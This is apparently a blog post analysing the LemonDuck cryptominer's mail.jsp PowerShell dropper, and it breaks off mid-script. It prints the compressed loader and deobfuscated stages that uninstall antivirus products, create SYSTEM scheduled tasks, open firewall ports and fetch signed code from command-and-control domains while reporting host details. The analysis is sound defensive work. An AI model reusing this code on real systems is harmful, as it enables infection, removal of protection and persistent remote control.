Malware Analysis:Lemon Duck CryptoMiner (mail.jsp) : Part I

Today we will be analyzing a malware named LemonDuck which is a CryptoMiner malware, we will perform this analysis step by step and try to uncover what this malware does.

You can find resources related to the malware we will analyze from this github repository.

⚠️ Any domains/URLs/IPs or Scripts discovered while analyzing malware are malicious, I defanged these URLs to prevent any accidental click, Don’t Try to visit these Domains or run these Scripts on your host machine, always use a Sandboxed VM to perform experiments

Stage 0

The LemonDuck malware has various phases and stages, and for them it had different scripts like mail.jsp, 7p.php, report.jsp, a.jsp

We have the Malicious script mail.jsp with us 👇🏻, This scipt usually comes with a phishing email and a doc file, so when a victim opens up the doc file this script executes.

IEX $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$('edbd07601c499625262f6dca7b7f4af54ad7e074a10880601324d8904010ecc188cde692ec1d69472329ab2a81ca6556655d661640cced9dbcf7de7befbdf7de7befbdf7ba3b9d4e27f7dfff3f5c6664016cf6ce4adac99e2180aac81f3f7e7c1f3f227eb7e7df7d903ffb2c4d3fbaf3f1effdf127dfbfb7fbbda745599ece9bdfed93efef7e6f5694cf4fbfddfc6ee9d638fd993b7b0fbf5f1f7f7bfabdef7ffea2a8dbd7df1bddd9bd2f9f7cf2a9f9657f67577edbda3a9d66e5cbbc1edff9f877fb78f4f1ce8b871fbb8f1edeeb82b22f7eb2677fbbb71b01f61b27bf7192de493ffee4e33bfbf7be4f3fea6c7ef2bdef5fbc38abdf00d0c307dfe74f3eb90738fcdbdeaefe66e0bc1adff9f4a17ce45e7c70a0cd774df34f76b491f7defcfc17dd3b98d3bf34fa3d6d47487cb26fbaddf13ef5dedba78f7bc81298879fd3a7e7f48b6bfaf01e7dd4c56ecfc07ff8a9fd5648d5479068cd083edcd776077644f7154cf8c2b3bb69d6b4afd2657b37cddbbccc6777d3e66d93b5f4dd27f4fff9b401d9a9d9ee40bb694358699bbdacd1f7d0d4fcda7f03cd7fe3e4edb42a279f2dabc27436cdd2fbf7763f6beb6aa59f94fa33a3a6e96ada7e5656d3aaadea55ba2c3eab8b59fae5c58a5eb95ee633faedb39c505964cb342fd7752aafd227bf6836cbd2b2ccaef2ba38b7bf5cd287f3a6cd97820ab533d8008dfd7d46a344c78a83f66f70eda1b1bfcf681020c284fed586f922a33f14a79b31b9779f3b6ea7f972594dd3dd31fff759d3e435bd6c3e7eb877fffea7dc7099b74d51a6fb9755bb7fc9f0afdf1162f82acda7d9799db7cb22cddfe563ee82e70a98d1ff7fe364f6fac553fde3b5c0c4209572bfe862592cf355c5a07cc40906006a2b819b4e6996dfd137f978b6986220bfc4eb279fd6d5b3dfe3f7f83dd2dd345f97d94f6ea74f5f7df9dda769beba7eb36dba23d26394ab4575929793ac299e82ac0d0d804858672fafbff3aece2febfcf5325b2cb3e7f467934f0b7c40bfb6f9ebb2aadb6545289cb4cbbcaed727d7df51c8efbe387df3faf741b3475f3cffbdbe4d50d3799bbddc4eaf5b08268db17ea94d17797bb64dc0527a7814f28b1dc9fd7495e765b3ddd659db4015a5f270db3bbf8440d3f08bc5d5eee5ef954eb78964f95cdfa5815c1121a7779951dbac5c2df237f9b2783ea3f1d0980fe9734c13bd4f88eedd234c2059d7cdf577e8c7bbe6aa9a19892aae3094290019e8d4844604bab5eb69feeef45044e1453e6f77e9b7cbdfeb136acd6f10315ffce2df336d30f465be585fd4c7db2034387f55d4d366b26e40d0aaaa4128e2a1558377b6d39a61ae9b65050a03eaa9877fda345979b24d2f2c8934cb39949b11c0b362f15d5075ebb33a17008777564692dad7294bdd715dd5f5e976fa4b40896f9f9e8300d7af7fffd75f120fbffcfdb3367b3a333cd7b6d982388abfd8bbb72cbe4bcdd3e3d767d4394685fecfdafc82b5ee9bf4f4d5e9b7bf9beeec7c7a2f7d71f6ed3767df4d09fd4bfaf214e2405d6746a68bf362868fbed0419cfdfebf7ffac597af9e61a2bf95be39397dae2d4f5f8394d775befe09fd04483fff89ef32852fb2f5c512526f9a5343fc264a61fd1368bb77b92830d1983821f56720f56b901ae8d10ceaf4c9dc9d0773673801f38751d2ff65169d2cc526d3bc35cd56afcd9cb625bd5c3ce33e69b8e12cd2c4d1b776eedab27826fddf8e710ceb4b5fa44f66cbe209b1807ece9c50bd01f6b9b101d483c5c2f1b687cf778d781ab1bb4393bf6a7e7a9c65f4cbe8dba7fa967c461f6d1126e50a1ec49dfb5b8443dd02d3f19a084badcff7bef2da50576836daf11b2a406dbfebb71f37ab05cd10bdf67b7de604df436e99bd224654c3a4d3e9be57c8bf71f28bef34c0c7dacc22c59f5bf36996d7d5b901a65f924ade2c32d4992f354c5e92187d9d05c770822f3f78edcc529ad036c2a38d5586a8198b111823358a00e8642c3f2c3c8edb03311219b2c2432d4418444ba00f2742f8f202024aaa1e72e60bcd80c4d04764a3266f696e26a1b8dc8e5d3d99d8201096013125bff8ce6e5b54339a2c2552da56cbedadf3025f7e6c9c008cee97fce2f9d4307936fd25f8fe4bc8eeca90f7f4dc204f9f4e6846187fe0c6089d6bb3ed94be8a0c0253c883c07407e3c0076e280a663b255fe2a7275f9e7d61669786f5f967bb06450c8a7ffd187afc523ffdbd78ccd75039ad38713c905ff263f837b08d3ff66332c2d5122c4f389e2f0de85dfdc96283f1c1a9f458665d5b4f515b2ab45dd3817eecfaf925f687fc04adc13a537c62bf92dfcad248f472bb5d570f3f3fbf431f2d217e76c27ed168271d994fdd2ffbe9e84e548b384aa93e01cd9dda09f5c98022d19ea14f7eaf1191e5e91727bfffeb97f4cb967e639a968bdf7b0cf2304ac624d28c9b0fb7e8e79b1a7ee10579f9753e331e6c0546a4063f6669f163bff8ce9da0ab665964e4459d8cadd08c89d7dcdc90738c1ece0b0be2175fd72dfdaa5d989ffc4d7a47ff6a445b01545b2c8bf3fc29e1aadfc938c84715d75b3f4527a9aa3fd3d11d526f851938bdf09650d211db965ef77776b7c045fac91be26ea645754e2f7c66a8e6204a27a0c6b961591084b514bdf5ac3594fe7c7c59376d0328044f3f14b01d36edf1a72535f9868e65520a1b66c53cbd127f118ea242a5afab156b0092108aafe8ef50a29cde3172b4f3695a2deeea87e9e99baf5e9c7d914e1bc46044a2a995acc6cd99cc55de94791ae2a9df035dead96117e0d443c879211e423e26048b0d559342d23b78614eed84678dd856e637674ee9a3f4b3943b53f2fe127c0199bbf84c90f8c518ce2fb923edb73e713a1661035ce9e2bbf49b7eda9e57afab7a5a7c4110a0771504778fbee9e35f7c672ffd45f9767aef7777b6aa3092c02848570ad182d8d5b7b4ad7eadaf505fe8cebacabfc8bcb513be65858b3994f54723fe81bef6e53be6d2e5d9a347dfbfceea3afb1ed1072f1b42aa77e1dc0ac7602c374e89776c2848ad136d3f9669dddba579a5af83a9ed3359c05c910e0cabc43b21f8dccf8dfca360eea68e9884034c8087869d50fd532db76fb2d972a879bed34195f52ad408beb0ea417483a71414aad18d0c694b02f713db0a9f6af43aa6cc004536d3d7a9cd83c0305348656cf4f655fe8226d47f979c5e0c74514dc70fd7f72693712bceaf7c52e76f7f30a6effd0f41cbfade0f7ec02db77ecfcf982578c877ee7cfabbdf59904c64afe0036c7df2e916f9756bf4ef3e8599dcdbdb1d8f1f3ca4e4d8787cffd34f1edc1f8f0ff6b7befffdef5162895275cba2fae9ed7459afdb5cfc4b9e8a5f7c674b44030a1e384d97eb7343deba6a33e38b92bd5a168bd93174cbf7f3b27a453ea87e5516eb272ab5e3325b155332a62fc7d76d5153b0fbfa7b5bd2ba39e394165e20824b0e8030874cb405fd3d3bebc320842c98efdb8fc1387e53851af4aa9f7d6febb34c26453ff88d13a2ef9db26649cb0eef88907f4b7e3089ee08b16b23bea3a7675f7d35be63677f3da37c84b8f264c5d7488888972eec505194b10dad363afde2f8c5ab5383c9578f2e973974837cfce6ab975f7c79c29f6903c2e7f72455c888fc1ef4ff4f2ea935fee648e9ae7ca1dfef7d25bad07dc2ee8afbf3eedd47abb69df31f460d7d26a3fe25bfe497dc99d04fc3183ce8ad77f977ab9f22a067bfd84ed29d3bdfdf7d402cb5f3bd19373724f5d849fca6d7fb9fe64df66451195e794693dad6c6221befd4444fd594d2a62499c52511128da85be54611b9aa5d5dd727bbc7df7e3dbe36199455565f207bc45fd14f4cb47e45f3adbf91e38f39704a4684736b34e1d9a668ebfabca02cd5b8164543690efce292580ac74b712ecec6083ba9d9a145d9c7f2f8f52b4292b1e3bfc7f0be95073dfdf0197a3cdcdd79b733dac13ff8ed3362fa65b57a773a061686153fdbd9cdbe3d7bfe2545c8869c0f5e7dfafb9ce5e7bb3fbd7b39fd89af56cff7eefea09cfcf4eae4f9d39f9edc3ff862e7e4feef53ae7fd177df2e4fbeca5f3c9fef9fe7bf08a2bcffea07ef96f7a6c7af7fea607af5f6d54ebd738f5cc6e793f5f3d5c1eec1f362faf4bb3baf7e9fbb6fa0b0f7ea7bbfd78345f9eddfe76c5ab43f78f383cbbd172fee7d71f5f0ecd9cb9fde7f5b7ff77cefd39f6cbf3d59bf582edebcb877975eb93cb8bc982d56bff793ddcf2f7feff583ddeabb8b3d67c7a1c48437f423cb22c21bf22981f945f9a5c7179f35fafbda38c5246daeed1742a9c6b2964e9b4c02b5f0e7c134e9cf0503f9fe94fe1d8fef3dd865f6fe0c2cf28befd09f690b0f663bc5f70a03f102710bb4ee74ccada792b63bbc73676bb6ccabd6389a19471477b616f44bdbe4e459537aae267530be63e304ff43564362234197265fffa2bc9ee45763e3cf62d8cbefc19065f92b1874007e0dc58854f699c254d543a333c4dcda6af2f67a62dde28bf1c1796b222bea0ad91e02504d97f9d8a8b67779fb3dfd95befa6cc614114529ee3f990670a86455d4d051cbd3f3d9ec8b2faee9f9fde5cf541280dbb0fe4fc56891d9803efb3de8e767f48b76c3302030f0c5c9d559926f92bfab2617cd02c9666db532c2b826f78284a60477379476b864ff1669d99d9d1d8a8d966bb2fb799d5d95d917db64538e390b4d6490cfe8ad2f9c5bb9fb4b1d85c136f54b581bcadc9ec0c491974419236dcaeec025e21fc779a4ff96ec10b5dcb19988d2ad89003722d7efae1f18cb44a424fdf2e277ff3632026f6971807878892e73027ea549408ae4606756bc3480c4553aa1a173565b30f351eae282dfb477edfbfc776fd675f19320894187baff18993b8bc1c758195124a47743fe5b224100627828142586a1c2d0f0b9677de5c3877ffebb43295c66bfbbd34c839d767a335c39dc21b5409f0ab9df75db64e8d9756938e3869ebd6ef50de95dfff091d08f86066f59ef2da9cc5593fd5ebffb00d9c1093773dcc7589db24450d89b88dfe6cde9c689ee756748647b9d439571a6e2f7c677dfdfb9f7bdd3c597df6e5ed25a2aad84ef7deff48b2fe7aff157ba958ed38fb768c9fc301d6fa5bfdb65fe6a5235f9cbfaf49cb2a42f4ef2f19b2f5fb7f5d9f262ebcef77647f7beff09adac6fff7475b6fcf8e33bd4c7e779bb7d79fcea2c9b3c3f4dd3f2ea414e99dd3be3cbacfc2affde36f941db5be9e656e3325f7efe669edef9fef64f7f59bc20b0bf71f2ff00'-split'(..)'|?{$_}|%{[convert]::ToUInt32($_,16)}))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();

This seems to be encoded script Let’s Decode this, and see what it does

Stage 1

After Decoding the Script we get

$LW7eF=  ")'X'+]31[DillEhs$+]1[dilLEHs$ (. |)29]rAHc[]GNirtS[,)15]rAHc[+65]rAHc[+401]rAHc[((EcalPer.)'$','0N9'(EcalPer.)93]rAHc[]GNirtS[,)401]rAHc[+201]rAHc[+311]rAHc[((EcalPer.)'

 ) '+')43]'+'rahC[]gNIrTS[,)97]rahC[+301]rahC[+211]rahC[((EcalPeR.)69]rahC[]gNIrTS[,)78]rahC[+111]rahC[+09]rahC[((EcalPeR.)hfq38hhfq,)121]rahC['+'+47]rahC[+021]rahC['+'((EcalPeR.)421]'+'rahC[]gNIrTS[,hfq9G'+'fhfq(EcalPeR.)93'+']rahC[]gNIrTS[,)27]rahC[+96'+']rahC[+201]rahC[((EcalPeR.)hfq0N9hfq,)94]rahC[+811]rahC[+57]rahC[((EcalPeR.)hfqF/ astR nt/ eteled/ sksathfq+hfqhcs

F/ 1astR nt/ eteled/ sksathcs'+'

F/ 2ashfq+hfqtR nhfq+hfqt/ eteled/ sksathcs

kcolb=noithfq+hfqca 531=trophfq+hfqlhfq+hfqacol pct=locotorp ni=rid Ogp531ynedOgp=e'+'man elur hfq+hf'+'qdda llawerif llawerifvda hsten

kc'+'olb=noitca 544=troplacolhfq+hfq pct=lohfq+hfqcotorp ni=rid Ogp544ynedO'+'gp='+'hfq+hfqema'+'n elur dda llawerif llawerifvda hsten

35=troptcennoc 1.1.1.1=sserddatcennoc 92556=tropnetsil 4vot4v dda yxorptrop ecafretni exe.hsten'+'
hfq+hfq
dSNDhfq+hfqS 92556 pct hfq+hfqgninepotrop dda llawerif'+' exehfq+hfq.hsten c/ ex'+'e.dmc

}
hfq+hfq
ecroF??? 1 eulaV- DROWD epyT- hfq+hfqnoisserpmoCelbasiD OgpsretemaraPyJxrevreSnamnaLyJxsecivreSyJxteSlortno'+'CtnerruCyJhfq+hfqxMETSYSyJx:MLKHOgp htaP- yt'+'reporPhfq+hfqmetI-teS

}
hfq+hfq
5 peels-trats '+'

})}Ogpdmcimw1vK c- llehhfq+hfqsrewop c/Ogp=etalpmeTeniLdnammoC;Ogpexe.dmcyJx23mets'+'ysyJ'+'xswodnhfq+hfqiwyJx:cOgp=hhfq+hfq'+'taPelbatucexE;e'+'maNeht1'+'vK+OgpcOgp=emaN{@ st'+'nemugrA- OgpnoitpircsbusyJxtoorOgp ecapsemaN- re'+'musnoCtne'+'vEeniLdnammoC ssalC- ecnatsnh'+'fq+hf'+'qIimW-teS(=remusnoC;)pohfq+hfqtS noitcArorrE- };OgpHEfmetsyS_SOfreP_ataDdehfq+hfqttamroFfreP_23niWHEf ASI ec'+'natsnIteg'+'raT EREHW 0063 NIHTIW tnev'+'En'+'oitahfq+hfqcifid'+'oMecnatsnI__ MORF '+'* TCELhfq+hfqESOgp=yreuQhfq+hfq;OgpLQWOgp=egaugna'+'Lhfq+hfqyrehfq+'+'hfquQ;Ogp2vmicyJx'+'toorOgp=ecapSemaNtnevE;emaNeht1vK+OgpfOgp=emaN{@ stnhfq+hfqemug'+'r'+'A- Ogphfq+hfqnoitpircsbusyJxtoorOgp hfq+hfqecapSemaN- retl'+'iFtnevE__ ssalC- ecnatsnIim'+'W-teS(=retliF{@ stnemugrA- OgpnoitpircsbusyJxtoorOgp ecaphfq+hfqsemaN- gnidniBremhfq+hfqusnoCoTr'+'ethfq+hfqliF__ ssalC-hfq+hfq'+' ecnatsnIimW-teS

)HEfpsj.aaHEf,HEhfq+hfqfpsj.aHEf(ecalper.))5(gnirtsbus.u1vK,HEf2UHEf(ecalper'+'.))5,0(gnirtsbus.uhfq+hfq1vK,HEf1UHEf(ecalper.spmt1v'+'K=dmcimw1vK

naRteg=e'+'maNeht1vK
hfq+hfq
{)su1vK nhfq+hfqi u1vK(hcaerof

hfq+hfqpotS noitcArorrE- };OgpHEfmetsyS_'+'SOfreP_ataDd'+'ettamhfq+hfqroFfrhfq+hfqeP_23niWHEf A'+'SI ecnatsnItegraT EREHhfq+hfqW 0063 '+'NIHTI'+'W tne'+'vEnoitacifidoMecnhfq+'+'hfqatsnI__ MORF * TCELESOgp=yre'+'uQ;Ogphf'+'q+hfqLQWOgp=ega'+'ugn'+'aLyreuQ;Ogp2vmicyJxtoorOgp=ecapSemaNtnevE;OgpllabkcalbOgp=emaN{@ stnemugrA- OgpnoitpircsbusyJxtoorOgp ecapSemaN- retliFtnevE__ ssalC- ecnatsnIimW-teS

{)1tiod1vKhfq+hfq ton-(fi

'+'hfq+hf'+'q}{hcthfq+hfqac}

Og'+'pHhfq+hfqEfllabkcal'+'bHEf=emaNOgp retlifhfq+hfq- HEfnoitpircsbusyJxtoorHEf ecapS'+'emaN- retliFtn'+'evE__ ssalChfq+hfq- tcejbOIMhfq+hfqW-teG=1thfq+hfqiod1hfq+h'+'fqvhfq+hfqK

{y'+'rt

}

}

5 peels-trats

Ogpnt1vKyJxfnthfq+hfq1hfq+hfqv'+'KOgp nt/ nhfq+'+'hfqur/ sksathchfq+hfqs

1 peels-thfq+hfqrats

}

}

}{hct'+'ac}

}

lluhfq+hfqn-tuo9Gf)llun1vK '+'hfq+hfq,0 ,llun1vK ,llun1vK ,4 ,)))5(gnirtsbus.u1vK,HEhfq+h'+'fqf2UHEf('+'ecalper.))5,0(gnirtsbus.u1vK,HEf1UHEf(ecalper.sphfq+hfqmt1vK,OgpDMC_SPOgp(hfq+hfqecalper.lmX.ksat1vK ,ehfq+hfqmaN.ksat1vK(ksaTretsigeR.redlhfq+hfqof'+'1vK

	{))OgpDMC_SPOgp(sniatnoC.stnemugrA.noihfq+'+'hfqtca1vK(fi

{yrt			hfq+hfq	hfq+hfq

{ )hfq+hfqsnoitcA.noitinifeD.kshfq+hfqat1vK ni noitcahfq+hfq1vK( hcaerof

{)metiksat1vK ni k'+'sat1vK(hcaerof		hfq+hfq

)1(sksahfq+hfqTteG.redlof1vK=hfq+hfqmetiksat1vK

)Ogpfnt1vKyJxOgp(re'+'dloFtehfq+hfqG.vrsts1vK=redhfq+hfqlof1vK

1 peels-trats

}

OgpDMC_SP c-hfq+h'+'fq neddih w- llehsrewhfq+hfq'+'opOgp rt/ F/ '+'Ogpnt1vKyJxfnt1vKhfq+hfqOgp nt/ 06 om/hfq+hfq ETUNIM cs/ etaerc/ sksathcs			hfq+hfq

{ esle }

OgpDMC_hfq+hfqSP c'+'- llehsrewopOgp rt/ F/ Ogpnt1vKyJxfnt1vKOgphfq+hfq nt/ 06 om/ ETUNIM cs/ '+'metsys ur/ etaerc/ sksathc'+'s

{)as1v'+'K(fi

naRteg'+' = nt1vK

}}naRt'+'eg=fnt1vK{esle})naRteg(+Hhfq+hfqEfyJxswodniWyJxhfq+hfqtfoSorciM'+'HEf=fnt1vK{)as1vK(fi'+'{)2 qe- 3%hf'+'q+hfqi1vK(fi

}naRteghfq+hfq=fnt1vK{)1 qe- 3%i1vK(fihfq+hfq

}HEfHEf=h'+'fq+hfqfnt1vK{)0 qe- 3%i1vK(fi	hfq+hfq

)u1vK,su1vK(hfq+hfqfOxe'+'dnI::]yarra[ = i1vK

{)su1vK ni u1vK(hcahfq+hfq'+'erof

}

OgpllabkcalbOgp'+' rt/ F/ llabkcalb nt/ 021 om'+'/ ETUNIM cs/ etaerc/ sksathcs

{ esle }

OgpllabkcalbOgphfq+hfq rt/ F/ llabkcalb nt/ 0'+'21 om/ ETUNIM cs/ '+'metsys ur/ etaerchfq+hfq/ h'+'fq+hfqsks'+'athcs

{)as1vK(fi

{)tiod1vK ton-(fi

}{hctac}

)OgpllabkcalbOgp(ksaTteG.)OgpyJxOgp(redloFteG.vrsts1vK=tiod1vK

{yrt

)(tcennoC.vrsts1vK

ecivreS.eludehcS thfq+hfqcejbOmoC- tcejbO-weN = vrsts1vK

)HE'+'fmoc.9u3bb.tHEf,HEfmoc.9rekz.'+'tHEf,HEfmoc.0'+'r3zz.tHEf(@=su1vK

}))6%)modnaR-teG(+6( tnuoC- modnaR-teG9Gf)221..79+09..56+75..84(]][rahc[(nioj- nruterhfq+h'+'fq{)(naRteg noi'+'tcnuf

)Ogprotarhfq+hfqtsinimdAOgp ]eloRnIthfq+hfqliuBswodniW.lapicnirP.ytiruceS[(eloRnIsI.)hfq+hfq)(tnerruCteG::]ytitnedIswodniW.lapicnirP.'+'ytiruceS[]lapicnirPs'+'wodniW.lapichfq+hfqnirP.ytiruceShfq+hfq[(=as1vK
hfq+hfq
HEf)lru1vK(a;)HEfHEf*HEfHEfnioj-))modnar(hfq+hfq,DIUU.)thfq+hfqcudorPmetsySretupmoC_23niW tcejboimw-teg(,EMANREShfq+hfqU:vne1vK,EMANRETUPMOC:vne1hfq+hfqvK(@(+HEfHEf?HEf+v1vK+HEfpsj.a/HEfHEf+HEfHEf2U'+'HEfHEf+HEfHEf1UHEfHEf+HEfHEf//:ptthHEfHEhfq+hfqf=lru1vK}}})b1vK]][rahc[nioj-(xeWoZ'+'I{)hfq+hfq)))]171..0[d1vK]]hfq+hfq[rahc[(nioj-(gnirtS46esaBmorhfq+hfqF::]trehfq+hfqvhfq+hfqnhfq+hfqoc[,)redivorPehfq'+'+h'+'fqcivreSotpyrC1AHS.yhhfq+hfqpargo'+'tpyrC'+'.ytihfq+hfqruchfq+hfqeS tcejh'+'fq+hfqbO-weN(,b1vK(ataDyfirev.r1vK(fi;)p1vK(sretemaraPhfq+hfqtrophfq+hfqmI.r'+'1vK;redivorPecivreSotpyrCASR.yhpargotpyrC.y'+'tiruceS tcejbO-weN=r1vK;10x0,00x0,10x0=tnenopxE.p1vK;)HEfHEf=01aHdLOqfprhfq+hfq7R6YIef1j1vcQUpL2/zlbjpCLDjb58M0C5YluqWknCUeNLh4feqi'+'4Rzxn3cASZ8cwkR0r03mugLbuLp818LicDW0RY/T'+'m2r3K7mlHYIcitzTzv2NN3Mw9IFPj4krWf26VtHbuNnmTN3/'+'v8vgdmpXB1GvXu71oWm2Hhfq+hfqEfHEf(gnirtShfq+hfq46esaBmorF::]trhfq+hf'+'qevnhfq+hfqoc[=shfq+hfqulhfq+hfqudohfq+hf'+'qM.p1vK;srehfq+hfqtemaraPASR.yh'+'pargotpyrC.yhfq+hfqtiruceS tcejbO-weN=p1vK;]c1vK..371[d1vK=b1vK{)371 tg'+'- c1vKhfq+hfq('+'fi;tnuoc.d1vK=c1'+'vK;))(dneotdhfq+hfqaer.)))(maertsesnopserteg.)(hfq+hfqesnopserteg.)u1vK(etaerc::]tseuqerbew.tehfq+hf'+'qn[(redaeRm'+'aertS.'+'O'+'Ihfq+hfq tcejbo-wenhfq+hfq((setybtehfq+hfqg.8ftuhfq+hfq::]gnid'+'ocne.thfq+hfqxet[hfq+hfq'+'=d1vK{)u1vK(a noitcnufHEf=spmt1vK

)H'+'EfddMMyyyy_H'+'Ef tamroF- etaD-teG(+Ogpv1vK?Ogp=v1vhfq+hfqK

'+'tratseron/ sexobgsmsserhfq+hfqpphfq+hfqus/ tneli'+'syrev/ Ogpexe.000sninuyJxerawlaM-itnAyJxsetyberawla'+'MyJxhfq+hfq1~hfq+hf'+'qargorP'+'yJx:COgp c/ dmchfq+hfq

evitcarehfq+hfqtnion/ llatsninuhfq+hfq llhfq+hfqac OgpHEf%hfq+hfqytiruceS notroN%HEf ekil emanOgp erehw hfq+hfqtcudorp exe.cimw b/ trats c/ dmc

evitcaretnion/ llatsninu llac OgpHEhfq+hfqf%suriVitnA%hfq+hfqHEf'+' ekil emanO'+'gp erehw tcudorhfq+hfqp exe.cimw b/ trats c/ dmc

evitcaretn'+'ion/ llatsninu llac hfq+hfqOgpHEf%ytiruceS%HEf ekil emanOgp erehw tcudohfq+hfqrp exe.cimw b/ trats c/ dmc

evitcaretnion/ llatsninu llac OgpHEf%'+'pva%Hhfq+hfqEf ekil emanOgp erehw tcudorp exe.cimw b/ '+'trats c/ dmc

evitcaretnion/ '+'llathfq+hfqsninu llac OgpHEf%tsava%HEf ekil emhfq+hfqanOgp erehw tcudorp exe.cimw b/ trats c/ dmhfq+hfqc

ehfq+hfqvitcaretnionhfq+hfq/ llatsninu llac OgpHEf%%hfq+hfqyksrepsaK%%HEf ekil emanOgp erehw'+' tcudorp exe.cimw b/ trats c/ dmc
'+'
evitcarethfq+hfqnion/ llatsninu llac OgpHEf%tesE%HEf ekil emanOgp erehw tcudorp exe.cimw b/ trhfq+hfqats c/ dmchfq(( )hfqXhfq+]03[EmOHsP0N9+]12[EMOhSP0N9 ( . '(  "; .( $veRbosePrEfERENCe.TOStrIng()[1,3]+'X'-joIn'')(( Get-vARIabLE  lw7ef  ).valUe[-1..-( ( Get-vARIabLE  lw7ef  ).valUe.lenGTh )]-jOiN'')

This looks like some gibbersih garbage, however the last line is something which looks like valid powershell code, ( $veRbosePrEfERENCe.TOStrIng()[1,3]+'X'-joIn'') so this is a very sneaky way to call IEX(Invoke Expression) and run script, for example when i run the same on my powershell instance i get

and after that bit we have (( Get-vARIabLE lw7ef ).valUe[-1..-( ( Get-vARIabLE lw7ef ).valUe.lenGTh )]-jOiN''), this bit of code simply takes the variable lw7ef and reverses it,

So Let’s try to deobsfucate the script.

Stage 2

The payload we obatained is

(' . ( 9N0PShOME[21]+9N0PsHOmE[30]+qfhXqfh) ((qfhcmd /c staqfh+qfhrt /b wmic.exe product where pgOname like fEH%Eset%fEHpgO call uninstall /noinqfh+qfhteractive
'+'
cmd /c start /b wmic.exe product '+'where pgOname like fEH%%Kasperskyqfh+qfh%%fEHpgO call uninstall /qfh+qfhnointeractivqfh+qfhe

cqfh+qfhmd /c start /b wmic.exe product where pgOnaqfh+qfhme like fEH%avast%fEHpgO call uninsqfh+qfhtall'+' /nointeractive

cmd /c start'+' /b wmic.exe product where pgOname like fEqfh+qfhH%avp'+'%fEHpgO call uninstall /nointeractive

cmd /c start /b wmic.exe prqfh+qfhoduct where pgOname like fEH%Security%fEHpgOqfh+qfh call uninstall /noi'+'nteractive

cmd /c start /b wmic.exe pqfh+qfhroduct where pg'+'Oname like '+'fEHqfh+qfh%AntiVirus%fqfh+qfhEHpgO call uninstall /nointeractive

cmd /c start /b wmic.exe productqfh+qfh where pgOname like fEH%Norton Securityqfh+qfh%fEHpgO caqfh+qfhll qfh+qfhuninstall /nointqfh+qfheractive

qfh+qfhcmd /c pgOC:xJy'+'Prograq'+'fh+qfh~1qfh+qfhxJyM'+'alwarebytesxJyAnti-MalwarexJyunins000.exepgO /verys'+'ilent /suqfh+qfhppqfh+qfhressmsgboxes /norestart'+'

Kqfh+qfhv1v=pgO?Kv1vpgO+(Get-Date -Format fE'+'H_yyyyMMddfE'+'H)

Kv1tmps=fEHfunction a(Kv1u){Kv1d='+'qfh+qfh[texqfh+qfht.enco'+'ding]::qfh+qfhutf8.gqfh+qfhetbytes((qfh+qfhnew-object qfh+qfhI'+'O'+'.Strea'+'mReader([nq'+'fh+qfhet.webrequest]::create(Kv1u).getresponseqfh+qfh().getresponsestream())).reaqfh+qfhdtoend());Kv'+'1c=Kv1d.count;if'+'(qfh+qfhKv1c -'+'gt 173){Kv1b=Kv1d[173..Kv1c];Kv1p=New-Object Securitqfh+qfhy.Cryptograp'+'hy.RSAParametqfh+qfhers;Kv1p.Mq'+'fh+qfhoduqfh+qfhluqfh+qfhs=[coqfh+qfhnveq'+'fh+qfhrt]::FromBase64qfh+qfhString(fEHfEqfh+qfhH2mWo17uXvG1BXpmdgv8v'+'/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2m'+'T/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4'+'iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7qfh+qfhrpfqOLdHa10=fEHfEH);Kv1p.Exponent=0x01,0x00,0x01;Kv1r=New-Object Securit'+'y.Cryptography.RSACryptoServiceProvider;Kv1'+'r.Imqfh+qfhportqfh+qfhParameters(Kv1p);if(Kv1r.verifyData(Kv1b,(New-Obqfh+qf'+'hject Seqfh+qfhcurqfh+qfhity.'+'Crypt'+'ograpqfh+qfhhy.SHA1CryptoServicqf'+'h+'+'qfheProvider),[coqfh+qfhnqfh+qfhvqfh+qfhert]::Fqfh+qfhromBase64String(-join([char[qfh+qfh]]Kv1d[0..171])))qfh+qfh){I'+'ZoWex(-join[char[]]Kv1b)}}}Kv1url=fqfh+qfhEHfEHhttp://fEHfEH+fEHfEHU1fEHfEH+fEHfEH'+'U2fEHfEH+fEHfEH/a.jspfEH+Kv1v+fEH?fEHfEH+(@(Kvqfh+qfh1env:COMPUTERNAME,Kv1env:Uqfh+qfhSERNAME,(get-wmiobject Win32_ComputerSystemProducqfh+qfht).UUID,qfh+qfh(random))-joinfEHfEH*fEHfEH);a(Kv1url)fEH
qfh+qfh
Kv1sa=([qfh+qfhSecurity.Prinqfh+qfhcipal.Window'+'sPrincipal][Security'+'.Principal.WindowsIdentity]::GetCurrent()qfh+qfh).IsInRole([Security.Principal.WindowsBuilqfh+qfhtInRole] pgOAdministqfh+qfhratorpgO)

funct'+'ion getRan(){qf'+'h+qfhreturn -join([char[]](48..57+65..90+97..122)fG9Get-Random -Count (6+(Get-Random)%6))}

Kv1us=@(fEHt.zz3r'+'0.comfEH,fEHt'+'.zker9.comfEH,fEHt.bb3u9.comf'+'EH)

Kv1stsrv = New-Object -ComObjecqfh+qfht Schedule.Service

Kv1stsrv.Connect()

try{

Kv1doit=Kv1stsrv.GetFolder(pgOxJypgO).GetTask(pgOblackballpgO)

}catch{}

if(-not Kv1doit){

if(Kv1sa){

schta'+'sksqfh+qf'+'h /qfh+qfhcreate /ru system'+' /sc MINUTE /mo 12'+'0 /tn blackball /F /tr qfh+qfhpgOblackballpgO

} else {

schtasks /create /sc MINUTE /'+'mo 120 /tn blackball /F /tr '+'pgOblackballpgO

}

fore'+'qfh+qfhach(Kv1u in Kv1us){

Kv1i = [array]::Ind'+'exOfqfh+qfh(Kv1us,Kv1u)

qfh+qfhif(Kv1i%3 -eq 0){Kv1tnfqfh+qf'+'h=fEHfEH}

qfh+qfhif(Kv1i%3 -eq 1){Kv1tnf=qfh+qfhgetRan}

if(Kv1iqfh+q'+'fh%3 -eq 2){'+'if(Kv1sa){Kv1tnf=fEH'+'MicroSoftqfh+qfhxJyWindowsxJyfEqfh+qfhH+(getRan)}else{Kv1tnf=ge'+'tRan}}

Kv1tn = '+'getRan

if(K'+'v1sa){

s'+'chtasks /create /ru system'+' /sc MINUTE /mo 60 /tn qfh+qfhpgOKv1tnfxJyKv1tnpgO /F /tr pgOpowershell -'+'c PSqfh+qfh_CMDpgO

} else {

